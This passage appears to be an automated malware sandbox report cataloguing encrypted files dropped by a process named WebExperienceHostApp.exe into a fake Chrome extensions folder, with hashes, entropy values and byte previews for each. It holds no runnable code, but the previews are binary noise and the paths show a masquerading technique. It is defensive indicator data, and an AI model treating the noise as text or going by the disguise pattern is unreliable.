SHA-512:	5CE1C70C93C94F530483753261D1E037C15DE1D366D3A15C442EA2AF29736614B47D93BD7CD112F7BF103783630775B52F27D063DCF88B17C11E32058807F2B9
Malicious:	true
Preview:	B..;...(.......L.k.Z8.6:.B8RT?.".B.K..w"#T.`....$.p.T)TG..SjmYUi&>=G.W.R.....hO;\.~....%..V;....cS4TW..3.w}%#.(.E(b........!...Q.......lh3.B@.....4T8.....!Y..Q.T.%<......._.I.).MX'!..g..{"#z..<06..XU..i".9.q..4...o.y..+..."..!R.L..j-.. 5.LL..."..~......'..!..:]`s....zY0.y.<.(..V..E.Y..z.#$....<...pU.A~E..C.\.....w.Nr......v...j..<..n..]..2....xc.1.).U...J............;-.S..Q5Q..Z,b.%ur.Sn>.m.._..n@K+.r.O.C...M}j.!....j.........Q\|NBb@Rod...(..v..I...lK..........-...r..~....v?M...D.9...e.'.#2g%.9Zi[..tZ.(G..6O...g.....q}.h...0.9Y\|..{pD.o.q.L?A...........f...2%.\<h>....j.........Q..S.../>OB..C....h..xj...1!V.8deQ.O.M......#.\|L+b.q..@/.._B....L..\.....u.........`&F#.....5............8........Z.Aw$..n.....OF.........t:.....*.i..\W.{.a..F.....g9.....4.O.%.of2.<Qe.R..O...dl......K..@.U..,]....l.f.$k.[.s.....5....?w......!mI.8..t.s...Ln<w....N....!.Sd<.}a..^(.\W...M5k....F........._A.&>.Z7..n.t..r..9.{....`....C/.M.4c...~.<...n.[P...9...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.73

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	64813
Entropy (8bit):	7.997522140248982
Encrypted:	true
SSDEEP:	1536:jb/OJcIi28LcnHxWJxV/NekLSQQTxLXkSzPzY25txEe:POJPVsmxWrlpGx7bzjf
MD5:	7AA41FEF72388B147865D0A084E1A20C
SHA1:	B641E661E298C5B16786EE5F305A5BD25B17B8A1
SHA-256:	46516FE7C392F081BF66C8898AB4E84A7A96F34BE11812D78387D924C89A2701
SHA-512:	4CD69384D8582145DCDEBD303A5D06BE35640105070BFE3B5195978407315721C314BDF01949B579E3C2163BE3792F439EB229462F59F24AF75675E0C89EE990
Malicious:	true
Preview:	.MS.....h3..G.j]N....$....a..z]\|.~..:..U.M...t..xD.G..A...k........`..M..\|......W..G_.D..M.^....6.^,..........#tK..j..w[.......=..8<.../.)1`.?.=..b=..}.:W?...j=.YN..[K_.R.._.>k..Uau.w..r=.,.U.Xo.....k$.....&..)R.....P:.f...s.+....N..e^?0m.z.T.yy.1..\|.?.;.....rx.....V......:z.+........._._.I\....Ao.....F.5.XDbi....._Wo...82$. ...3....5.Rxj..U.on}B...W.#....s.";s..J.o."6.....o........D...K:A.8Bz\....(..`..O.e\|...6.P..Rz.X..7..$..]..7t[........X..ebm.X....'...g..-g.p.N..t.s&.f..})....!.... ...A.:.V.6.......?.M.D^E..K..=..t%E.C..'.s.P..Q....J..%....v.g).n2.F6.k......-p7f...D.'...?.~....X.Y.G+b`....,....OP..../.m......P.A.....;..0..._..#....,..)/.....Z$..L......?./..f.I....%........"O..JI.....YH......l{k@..W.\|..YV..$g.R.b>...6.'k]..P.b.L...5a.G.u.n.m~..h..!.(....C.....c.fw.X..f0.E.......=W...U..W.5a5u.....4... Q\.\..".=........z...m.W..,..@;..-..X...w0]e../.....OB.:..2/u5..Z...]iLx.?..T.5C_O4....:..GOz..>}...y.Pv%..M..B..G.t...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.74

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100094
Entropy (8bit):	7.997994030199969
Encrypted:	true
SSDEEP:	1536:4C0LGTTEuehZrfqJUxkr/lnQ8UsiR522LnxWQSoQiyKLqu31JAu0OwIhw3268sz9:4P4TuPcUjNsiR5znxWH9uK7rlDd6e
MD5:	F0A1482F87DBC0A6EA2534F322C4E682
SHA1:	FDA1221CA8B8CD3B8B48B28DEE843147056D402C
SHA-256:	A5E971105C37425154E1DD5E71247091F02B2E57748E91C7D8B36EA57A195F01
SHA-512:	8964C4E57B9F08C4D4E0EF2C5B537FFD4179BF7D702664CB9D663B6453472F10C9F8890CBCF8210771C988F1419C1F375BE7626B715E08E5A4B510622D569B99
Malicious:	true
Preview:	@.[.d...J.V.7.'.q.B".....{..k2%..d9).RT...Z...Y..3U=V...4<.y90../.3...p.....7pz\.d../.9..0...B.....;..)7[.5ey.d.6...5.b.byD.....n..`.l....o.....G..`...<W...e+'..2..W...]%.....@:..Q...A..=f.2...hO.j...H.3.....WH.X.L.5...3E.8.t./../B>.R...H.......cv[.I..g.......UbA1.~..2../.....~+.....g..........C..I..}.R.._.q.\|..)...}.....0...phK......7x5;..h#>d,...wn%.5.J.h.Yb.....;.?.N..[$7xi....\|C../.3.....f.u.{..../.@61..H.[./.#.n.8. ]1#.x..\|.....$`+g....Rq-..A..K........Z.c-2!L.M..}E....?..lF..)yB..XN..K..6V...dja..a..l...s..}...(.......Z...[.,.......(...f+.q......(..O.UI.75.:.j>E,V.u#3.T...q(...\....]\QJ...G.6.tO...O@..D.....X..)..6..s.U.]....r.Bw.8.N....d.!#.....@m....]._T.....j?...\|&#s.....=.E..~.......z....,..>}2..{X...o...............+. .N.-.....v._....JM.-.Om8Z...5...\|J.v0D.F........u....@v.+.=C3......#p..G....}..&:....f..>........';.6....*,"..ud.2t..1>.&1!T2.-.3.......]..fE..G8u.....?=.w7.U.g..{..D1..>J)...~%(.<.HI...B..M..H..........+1.Z...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.75

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	32346
Entropy (8bit):	7.994039415758425
Encrypted:	true
SSDEEP:	768:x9J8z9q7p4SWZ9CYwLHGCjNZQPahYvLH331gfNhCx:x9JGiLH/0DvLHHMhq
MD5:	E1FDD9D1ABBB0B1F09208E265B077A6A
SHA1:	51C427F0101EB3FB9106BD0D0A33242CC855C830
SHA-256:	4AE05BB16A695FC499A84E5129F8EAA628FF602DA7F75D04397EFF16F24BB541
SHA-512:	AB875717F617CB341AB74543FC0B0AC374CBBE87E948AA5C3F967A40BACCC0F31BF57E28F4A3FC5034690487B8B21FEABD183B72B8B2043BB2A411A149A14992
Malicious:	true
Preview:	A.mug$.k... .iYj...Ae.0.H.y.F.g...FQ.j....].#...X......3..v.....sp..N ...H8C\..)iL9a.?........{........]...y..~.9..m...d_.o.=..W.!.6t.........5. .:H.%......d..=y.oU!!..^......_..X?.gwkn/..-..I......r.1......a.... .ax..l...g....-5..M...M....e.L...#.T.h8o.........b..].Ub..IH~P.....2..<.<.g4]..b.zv.^S6.F.Q;..`.J<.A.j..vwN='..L....k..1..f...o.#.?.3.-b..(..0xx.........j..-E..w;Kf..ew.y.\.....[^.c~.........WZ....w..F..<U.....h v..W...=...+.H}.O.zZ( Oi.Il. .F..<!G....}.8f.=.&......\;...z.~..^..t ..T.n_z...7p6.......(..J..6`0......@.......#w.r..q.\|..r.;..2"..&.7...G.:K...{.m..M.L....#Q...Ap.S..W:X..g.8..[.bln.%'..h..kP;l.:.0l........E..=._9l.I..WS.,......_Z........M7Q..L@.~R.'..........U..;...T@..Qp.K.#Z.Pj.z.Q~K.w.-.....R.<.)Y.dj/4t..^.@...d&Z..K@....g.t8..?..M....{f.d>....}..r.B...z]>.J..}?...x..L...x.H....n.C.y.....:.wo...F:...aSg..T.z.>T.;.>............''-xfoVS.._.+dY....z....!.".q]17..;..).,DFT...g\...-..Z.X-a.4.0r...'......8Y....UqK..X

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.76

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	88688
Entropy (8bit):	7.998058346676402
Encrypted:	true
SSDEEP:	1536:icUGQY7EltmtVxG5+FIq9RkPyZT60Hqo5gYyCUGdZISaxRRppciYxx2W:FUGQiElctVxGAF74yrb5gPC3dZuxRRpG
MD5:	B9480F498E4BDB8F6664CE744C779497
SHA1:	612BA2991EA659695707B2DA7FFA75BA4F781D0F
SHA-256:	B89A5C62BF196176FC4F232AD2D4D57AA1687761B1962A226BDD59CE90812826
SHA-512:	42C619F2F647512921FB56C0BF2E51B1D43842B356F6E980DB0E2E13EAC1682D5AC4850010EAAEA45E553BF54A32AF78BCCDF0CACA2B9EBA15AFFD37B04308A3
Malicious:	true
Preview:	n.e.d...2..J...cH.'.N.......VL.l.S...v;..a..b......?.F..^...e@c...l..W..:.;.Q.....=.Sll.3....5. ...ms...(.....`-..a..8.-}2wA.+.Ih..w.I-..]...]B....M}.[$......o......>....w..n..$.?2..6PR..b../..!..........K...-#..`..W..2.._,..$....>~m=k.0.c..vL..PF....&wJ.D.\....z..... p.}...?u.........L.2.d.1.x:....).w.@;.b......B.o...r....fb..B.q.k....f~..[c.....KMd.x.......#...FU.i.!..q.....k.^..b`.l..2...\|?...L.....gs.PA/..r..j~.zG`.....n].r5..Ef"x!....5.ytg..&..2...j..?'<.....E.\|..~..).V..n.."..!....MyW.d.......~i.9@...C..m...VW.p..ee.r..:...u.....5....:9..D..k..i..;..$...M.!/Lc......Vz;w.:.'o.^.v.o...U.8lQ.6I....~..\.Y.fg..z.V....cM..&.j.... ...P\|....).a",.C..[a$a...:...D.Q.....0.).J...9.I...I.0.@a.._..BLB.R2t.hE.O.z-..O..p.v..0>ET...h...WP_.c."......i.V.P.d?%.2..I.W..O. .`...8.P.../.....hh.2N.,s5Q8..w...m.TC.H.._..o.3..R.BZ........g....y.xY.p9.._-\[.FR.5..0[TZ_9.wA..]T'.{.`...rO..b2....i?].I>......D..F_._..W.<'.....B....5<..F..k..V. ...)L-^.....[.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.77

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	44827
Entropy (8bit):	7.995942694972688
Encrypted:	true
SSDEEP:	768:ni6L5E3Y8r6Ec1afjHgn2ZkGdzuDW7kC9ovqXi7vQt3LM:dtEOarHC2WGdp7avX4NM
MD5:	23CB464D02358F12140C48D04ACD6729
SHA1:	5B091EA2A4418DA5D02BC92F14C89AE91AFE3CB3
SHA-256:	205B1D074CCF72952051ED927F9A4AF2316E55A8CB64DDD2324047878D4AE06B
SHA-512:	D97C5B264125CA3AA56C5E22F035584FCD36ABD15D53903C62375D689C30421E8C5605635DFE58ABC29BB8D125108460550B9180F2F9708D4EBAAD9C834B8BAF
Malicious:	true
Preview:	W.q...0.-n.g.Qv....n.3w..AY....i...v..>.T...Ve.xA/VF&^..$..t..cqz.k.\|.0E.!a.]/...0.wh..."..k_x6L.V....<$...JnD.+..-cs.n(..o.s..KRq..Y.j.[)s2.!iLr.....Y].....g......I...#./.!,....}l...a....k.h>.......u.b...<..be}Q.. H.W...Mo.4.B..,..9....v.$)R..,..m....v.4...V.o..pI...j..6.M1.....T.g.6.o.h.x.....+.+... rp......87..Y.BS.3.H..xep.>>.z....1...hl6...........A....VCa\.....P7mV........M.'h7..a.......4W(..e..Ti.Z<O...`.CH.P...%....L..3.........5..mlX..a.Q....L.......YR.wLt,......oH..\.....A..c\|..%....S..f..n.S.h.......QBy-..o.........\?bww.`..V.._..........&.......W.....N.1..m.+.\ctO.x.\`.z\|....l.u."p:6~v.E.+v./.].V..f.O?...g..H.?..C.O/....T.......5.C.\...6..l....c..l........=.G..-l.-&@.ot...........-.oo.t....q.~5...h.......u.(........x65..iz/.d.............m...,A.,b_..WR..>.......(...#.]]8~v..>....?..R.K.'.wo.7......:.P..u..$...gY........4.&.v...h....i..W.n9...?{H:..e..nts...v.2...R.A......4.......CG..].}0.f...:...P.XjT............C.j.4^\.>._.e......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.78

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	99045
Entropy (8bit):	7.998323358485621
Encrypted:	true
SSDEEP:	3072:s8wPhipsI0w89RcBK/1tPPSOmvQy6Y9LlDA2wMjcqeaR:s8wP8pZ0V4B6PPaxnLFx4qew
MD5:	48E6554F4F4405862EDDF45E5DC6F8A4
SHA1:	2DDDCAB47EA2C9849294D219656EB644A59B1D9A
SHA-256:	82C20D9281F8EAE695DDEE981CF74000BCAE7768664A1C8A4F6367831D57C15F
SHA-512:	951577D2FCD52939991B9F4C2AED3BBD10E9A41F40E635EBBCD440F1B1CFE2B950472D6B00305C96E390A5B5F863B35475CBA130FF3531CD56C3CACFF7EDB483
Malicious:	true
Preview:	L..l.I...'.F..RX...B.....`....5....Fs.[pV.8;r.l.(.Y.a...SqD.u%.\2..6...I@v=....@l.`..Hq...r.'/......s^.w.K_Q.q.OW...:N.0...w.2.8. .q....7........c1."DY!U......+).RM...U.\../GK._..$(^...2......."...o.,...ru.B.{ 74..X.#\.....@.7R....f.P.basF............V.i.G..s55.(.....qm.......d}..p....T.........7..H@..NfaP....D.7.e..xM.-...e.o.g{..c(fG..k.-.d.....9^Xk.nwI.y.\.w.f..&.b0..M`..........).?..-.9s..b)Q;.....j\#.ty...CiQV..K.=V7G...&.z. ..:.........9?...Gg..v~M..UYa$.T...Gw.=...s.O..M>..4.l.-v....=...2Ix..+..^fX..~......x.v.}..4..d. k.?:.@u.t.E3D..#...%./.%.rl.iy.}...p..l.z.{`.........:.n......".F....'X..Q........w..&..(.gQ.)~...k..Z..'.Z..Co.Y.T....w.t..m..30.QeLr8.x....v.4...uh././L!...p.9..].O..g.O..x...\|l.tHr.KF-`.r.......kl.3E.y.5.iSd7U.;9....u.!G....q.=...~.JA.8...G.......a..V.5..v....%F.M..~ah..3..P.U..m.....v.I..%;W}.....Jn........e..y.!....%.z.G..h....(,K....eN.xo.:.?wz3.e^L($N..v.DT.5.\..f,-....C...i(..vR.[..;.2..T.5.2.....{.3.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.79

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	38207
Entropy (8bit):	7.9947466799324705
Encrypted:	true
SSDEEP:	768:ZwW1wsM1s7u1y2rJ6pyOlQYhw91TgsH6unjIswH48TWVDbxKITzsmnO:GIu1yMJ6JFw4sayQR8jf1O
MD5:	78566E882108340849F23691ED8927C8
SHA1:	264B95F11EC8A61C572FDAFA6A67F59CBFA710EC
SHA-256:	133BDA06B66573656FCC497819FA8BDB5493D6B224354D10C96A610AA7C0F97F
SHA-512:	383CBFFB7C0E58CB84E2FB7D3A6C0E22BEA7C8022D8F96A5A03A388D451F79EDEA9925A9ED5A9636977C20B91F928F94B7F1E978EC39FCE0DE2FB6502137EBA5
Malicious:	true
Preview:	]x........d...).Y+.K....S.#...s>.x..................Uo..;...~O.........E..W..........re...N.y...3.&.oG.h..C.i..^K.....Y.t..-...}=...r...h...h.r..zXQ.W'.7..X...5..)]".7$:......%..0....2..98..6j(.S..l.../ ..:+ .n.$.Q.X..}...Ki.bHZy...G..P_.".5........(f]..o.f...8K.P.F.~...Z}...!.;8..G .....1.....>...'F.+.m1.....l.O....G...I!x6.\...[T.l....w..7.......I_P.....G..A......[.....i.XYr_h%.[......Oq.....qZ.S.:.}.........X.1+y..8.....W{k.t.P.I.\.7.....%f<.2.. ...>.dT.I0..@'=....O..0...pd......#R..K........U...M .q`..a.....n.C.....m..f...k ...w..;...&Z.$.>.......yu...)..6.C....J..m...b..D..dW..q..+.0\.$..+nHL).@t.>HXs@.+g.....x.....~..4u...x..L...-.3.2.e7vV.@.,..+............bK....xw......J..v.+.X.h}..T* KG.u.+..........h.}.(.w...!Mc._.8.?JV...\..z.,.[CR_Ff.g..88....r..@..r"lc.>..;..V+....g.^....).....`..),.0..\|5.~....Z.s.O.N..>eN......J.......z.X...+....^3aWL....F`.s.`[.c.A.+..D.<z.n.v.X3..o1...".....1..fq...h.....C....+.N.b.."Q...;...Fa.e.s..Q..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.8

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	116135
Entropy (8bit):	7.998330246951078
Encrypted:	true
SSDEEP:	3072:/wZO6Y2tBn3F7/iSFLoeiXXI+6X3Ulz605Y8TDZ:UOd2tBnV7/iSFL3nUN605Y8TDZ
MD5:	D50B23986C13A978079383F95172FC0E
SHA1:	9CE4B4078BBFD50D6E8465F059DAA3F12D19583E
SHA-256:	CEF39B404EC3FD029098A5DDD2E24CF39E35E41C11636F63AC5C6C2E7D0F1704
SHA-512:	9465A9718D08669892FF2F13692DFF9612D4AD23172FCF1A9F154C54A565920C9F7EE9FFE80FF4582D9B361E0C4916D5DC435113E061CF9D364EB6F9BA0AFF99
Malicious:	true
Preview:	.'..Q....-.......~).e.4.d..L.:U.....{..t%...>K....R.8.....rH.;....&.eRk.h.".s..a.03........D..\|o..Hn..g..=...'L.q.,..........v..`b2pF.b...F..L..58.BO....D...f.[..F7......f..6z..CR.Q.5.......'n.iC.C...t.....3..%.+o....b'\.Q.u..P0..6.3........./b@..H....-....t..]O...E....._~.K.?..I...U....e_8..4.....h..n......<.t.m9...'[Y[.f\M.+...91.."3].+...U....I....u}..U........1=R....^'.(t#U.0....x7......<d..P...cn......1J:..].......(.n.Ieg..v.0.)3j..H...D...d8n..`W...z5q.:.?...\|.z.M.OG.K6......>..`5.....Y..$...F...~}dS..u.?....D....2..$.,.f7.\...go1.d,.'<Y..Ls..-g...N.8].C....Y..\.n-`.._...].u..~.......4.h...x!.2..c.c..G......t.M.......,N.[.....ZP....l.s...l.Aqi.g....L.].a.p.J3!P%ML...-....s..+.0...e.T.{w..G...........H<...^f.....A./..2..#....U.N.c......L.....w.D......`..rrP..N^]5...'9..'I.....6K.)..l...!...V()....#..H..s:....,...IJ'.R.`;L..^....\|..O.?.^......_f.s...~....8...^-.]..Y..z?..u.^..cC.A.[.a...G...y0....Q..U.Y.....p....~G..Y...@.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.80

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	68742
Entropy (8bit):	7.997258585330826
Encrypted:	true
SSDEEP:	1536:9qeBnQ+LrvqNXwezKu8uQn06e6kcygVAjrDHiuH8T3jRo3o:9qPAryFw5ui036C7bIjRo4
MD5:	FE99BA70AD426A1D5CCBBDB72097FC9D
SHA1:	0533475AA1032B7A6FF63A6B623F27AAC1706A12
SHA-256:	33EE1304C42AAA7E1B45B4D4C61F9F3AAE9B4EAAA7F87732736F1DD54F3D0570
SHA-512:	6A4685298184D97652813AF92BBCE9D1B2E61F4AF75F3166F8FDB93FF6D447E4B337149E8D7531A2D4F20AC772747A4F51AD7BE2B7666EA519AC9EEC84FA71F8
Malicious:	true
Preview:	ZK..X...1.B.....a.}.q..K.p.G.=.q.h..j...I...4.B".4t....%....24.\|+56M.~..L.K/.V4p..)w.....&.<ge!.!..MNT..l.'...i...'.L...\|..f..g&.{.$5..E..RcN.MgS....p$.2Sb3./..u.$u....{S%.7..uX..S${.....q..P..0..K.`j...{L#..9k.xR.w..I-1...........4`..n..(.vl..2...t....sg.,..qe..>...m.d..Ft\\'..l.&wR....`.x~.a..V>..y.5j.>..........t..3.]d..^a3.^4.l..c..M>..yU+!.....=#.'..o..I6+7..F..@.s..........^......SX..........6uxe...i`c...j.E........r..QL/...zN..G..w...}E/..\.-#%.^..X.2.9I!...M.......M6........=/....L.,......1... k.I.....)g.!M.\L.}..L........U.. N.4.L%.....l.`.1....".T..j.'Y.I.....v...h.....i.......!...@.......J.BR....;..M...nA.jw..b......_Qp..h."..=f<..I...-.sb...".t.$.........u)C....&.........D...].`$..L..B...x....%.p.j.X..we............2...zc{3P.+..\....s9#..[}</.5...3O.yR.Uy....D....>.~.....0....B.......^......<......2..3.$;...X..o'..;..P..8R>.-.d....(.....x...qa...g......M@>...../.\c...`.2..1......n..&4..8.L..~#2.\._..t 3..$4.o..1...Q.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.81

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	102059
Entropy (8bit):	7.998054597912209
Encrypted:	true
SSDEEP:	3072:fDrncjHydith2ibxz7GBCTSYYRq3rAfoJ8pUuq9:fD7cjSE+e5GBCjYXf5M
MD5:	81923B3A609FDB4DAD140FFE96FF02EB
SHA1:	D9B260203958CED71B8DC09C184C29DECDBA9A50
SHA-256:	CA5CA7DB7BD029BCB69B697A7FE62372EA9161432B9DDEC76A55669268507EEC
SHA-512:	9D683803E563ADE4C4BF010AD89629736F762C15F9E8F60DD68C1344F16FFCB416548EC2AAB63AD57A94DCE1AECB65B79453ED9B6AB5A2E7BDF376A64674AD63
Malicious:	true
Preview:	....;l......_.~.-....g.].1.9".;.^.NY....J...t_..d...}`2.....0.R.-......].&Y(.....mI.X1X...Y8<.+.3.X/..:...5p.LN...8.+..)dKBs...?...p.7....8."..#..s./.'.:H...N~.b.....76.........._...M.0^.y.....a.m~H%.....K.....,#{.m}.....9..&.....e..jWX.sG..(<..&.$3........!.R._.4#.......DQ.).^b....#..0.ICF5.....CW......:VH\|o...d..2ks...K<..,..+...I..hH...T...,U....m.>.E.....Jr.!.......>.7%..c..........c.J&..Mg..?b...U.....J...K.ji...k..:.)kg.k.C......!H...7...6.6.M./.H.v._.PD.Q.n..2...).l.G..!'.!.z.>..-............8w.D.._..;.~.........d...t.).M....Kg....x}t0.{C;....W+ 3......LF`=.\|\.fs...g=.5..@....}.P..........o0wP2Y..n..5J.ZC.eA.z.E..l...H`....6..{`.t...(.@.k.Y_u.m.....K...t?...H...["....k.0....W.-..Qd...5.[yh.).A.....2.......Flz.....rD..W..K.H+.+..Z.1.Pd..._.e.......s.....K...E.....p.L...<.%....~..\|.u.....TsY....h.U....J.P....H.t.x.B.....y.......I.>v..T.Dv...e.E"..0.\A....aK....u.\...g....m.W%.]...e.h..y.U.r..^I,.v.b..j`..o..s..mWU.&`JT...im..o

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.82

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34227
Entropy (8bit):	7.994011364088701
Encrypted:	true
SSDEEP:	768:5RLYERYH4L8SlMzrhvJ36+Xa8DQzA83OChRyOrkAJgQfGHCasB0mgh:LPLMzrhwniQJ+C6ckAJgoGiasamk
MD5:	D167B1697DE3D85C00EF40F95B0E11D9
SHA1:	251EE1E1D23A13C5B473161E64971D7D8E31F346
SHA-256:	78A5531945A812883687C32DA4051841EE0EDD31F3A09B80819E1A0B25B5214B
SHA-512:	49A1B9C322ED08DECD5FB0FD2664D815D4E405683EF48477FAACA63F953E20B283FFCD042E7806722C81A1824A938F29B1A6368FEBE46BB58C9A220C80436229
Malicious:	true
Preview:	../.....tZ.O.J..V....Q.XQ.y2.g.Gf....{a...IwIL.+(...6..L.K.RB.8i-...qC.`....9.ga3..w..5E..6...-..&Ho....@.#\|..ZZ..J:_.s#..[.z...Q.t2.z..2.(..e...B.....n.(...VQ@......3...m....al.)....y....M.?..QZn..[..=T.F.....-....m.....D../F+O.@I.WV3OI+s....(.L[g_.3...t.N...6..=.&>.h?k.Q.U8-...R.V..K.....:R./.....c.......[.M..c.....I.....Gq.>/..K.y.l'Dg.m.!..<...Zk[.o.`...$..M. .Y.!.TR+$.U.4.E.D [...\...(j...n.uCC.E<cR.....k...^.t.&......\|F..............M.k.K..#k.L....4....FJ...Z......&1....w.:....%...3.T...Y.........st...d..K.].P..St...C. 4..]f.....V..4..7!V....t.._Q..)..]u_..D..xF...,.._xi....Q..?/@..7....D...3.g.vD.P..-..n..n.#....<...;..p8!.Q\w.}V.\OR.:....!6.RN.....{\|.o]..npm.g..1Y.....B._....y....2x?.H.!...a.....e..$:.o./...}..u........jw4].0!... .A...\|7b_.,H....'.......\|.#..d.4*..x.....?.&.d....#.^...G...P..L0b....&......}..O_l..`.g......zf.i....pXX...C..`\|t.;.4..#0..:.G..2v..c).....B.N.8...8w...!0.\|..Z&8...."+T...Lf.D..o......b.W.....W...M

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.83

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	92795
Entropy (8bit):	7.997902034189043
Encrypted:	true
SSDEEP:	1536:5KZwmro+0riVV3gvyVnbJd+l25h+BIyOCwWHTGBtHwPngp+svh/R9B0m2:5KZZb283g4f+lKyj9H+tOgNh/R9B01
MD5:	D3298F0CCB234B675ABF50B29B936BC0
SHA1:	29C8172D490A607E2C611630863ABA4BE6D09C74
SHA-256:	F80CA1132AD08D38D7C5C242F44A35C003DCF873AA3BBAA86165392525734463
SHA-512:	D30CA14D12BD31026513068B5145F7268497996529301CEB683EDCC25AD4CC0AD7E9435179AE957638DBA87F0A3B68E0E3E4BE89FFE868BD01EECAF3C06CE1A1
Malicious:	true
Preview:	d.I......g+`..OJT.-...T... ./8.D;..4.P5neA....(."...WV2.G.".:....f..@.BEj...>!..Y..fsq.X....g...#?L.....C........o.4(.....a..M1".F..c.....`..>...jf.,y..h.t..(...\..K........,'1&..1J..=..3.Z.-.h..v-e..n3.~...}...G..t..."N...'.8....A....2......\.c...f)j_.6n..\|......f...L9..uUa..[...g...M.%.V...J.......)..[...\|...$..N2r..2.....t..& ..o...d'Q...N....D.Q..xB3.[...+..V.).....@....2I.]..w.4....a.C...Id.........O..h......q`"........A.%}..!Qn....?...........LV\|^~....#qA...c?.....(...6.0..Xw....ag...Q.}hF....V.}ut..T.v#..JQ..+N....^#..16i]..u.M.:.F.k.[.1..3......a_t)...e.7...$..b....)...F..0...v..R)Kw.a]C.l,.XB....0z..R...k(.I.H.[`..5<,1>.....$.":.E.#.R.q...[! ...4...mx'.C.j.&....d.hO.. ..j.......Q.E+.-h.._z3..%.S(.o.Y........P.4......bb...@.W..0.....E..._....2.H.EH..k[...Y. 4O.."[M.......]$J.B...?.uLG@..-E.=C....l.....ex.}**.G'.=m.Ji4.....q.F..;....=T[D...}...T.r..oN/.cDXM.........'..cup.4.../..,..........=.W0...l.x.O-..5.e.9T.!l.Z.!,.BuQ....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.84

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	29025
Entropy (8bit):	7.994564520642329
Encrypted:	true
SSDEEP:	384:Y+/SehuqOmgpejZj1Zn6l9248d9n318ayDnH0QlCZbCk0fcpyv82xy6t1zub:N/VdOmgpe1Cl9Ql8ayDUQoZYfpM6tdub
MD5:	2B776F43903C96EAF10BD758DFBB9177
SHA1:	4F9E9ECD4028C3ED39DA3A481A8146FB3D4F16BF
SHA-256:	E8020B2D733E5200514C54C6401787669F72EAB2692119A39BE31A847D4A4303
SHA-512:	52D3F47DF943E8EE1A0AED108B318400B25B2FC88168227A828A637BCC3B9D37C46212388D2EE393F8B6F73B60B129756FF9AA85F0540E017ECB1A2A64708376
Malicious:	true
Preview:	.2"y..Z#".g.~..}..g..$..A..3q......,.Y.&.......;S6..(.Eo..?.t.Q.C.g.G.P&.1...j.!.X.\.1ET......n.G#.........~..Z..V..~O!.....j...J...'mu2..n.B1.K.G.o.}.A..^..-t....{.....e.T..X.h.LC..^...:c?......K{V..8m..r..*....)g..._,V..8.K...^[C6..ln.....\|.......y..../..:....Ov.../...R..!.S..^..MR.v...:..z...V.<...2........ln...'......9..9.._.@2..(zXq...7...K..s..Az.)t...Q%.Z.#...G.^W..-h....A._.=Q...L......K.[~Y.Ab....:Uc4....\7..A.+...u~%..).@G.{pS.PG. &.9...P........6....n7..\c9...Y...dp.C0!...X..+..J.e..O_..#.....D..A....J:.".._Z..t....2...B3>.#....k^.;...Rol?.y.A....&'.\|........4.J......H..i...,.....L...en6......R...<..}..`.......)...%...DY..q Q....../..J./.....6/.}...9R.....{.[..ki;.....N.........)d.c..t.....Q.Xs.?^L.....T).={.H..A.ptX..t.A.D.."..C.........G\|.L..Wn..I.t...p....x.c..4...a...7.;..F...1.....u]"ro..T.p..I..!......\|\|3.qF....=Ta.7.-I.....o.c&.nf...Lq....c....q6...^T....KD!...M?..d#.....:/......Okb......Yb'w.\|>.k>j.P\..{...Y.......l+q.4

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.85

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	207268
Entropy (8bit):	7.999051433228926
Encrypted:	true
SSDEEP:	6144:dANzec6KClGKkvVBspri0LDCyDuTBowGV:d0zQcDLsBiiPDsBowGV
MD5:	D8433EDBEB1E761FA6FB5E3991071843
SHA1:	A57AB810A4D4C99C4A9608EBF391B3EAFFDF6325
SHA-256:	32BF3248625803FC2DDDF4768C161524ABDBBEF37AFE2318D1C92744397957BF
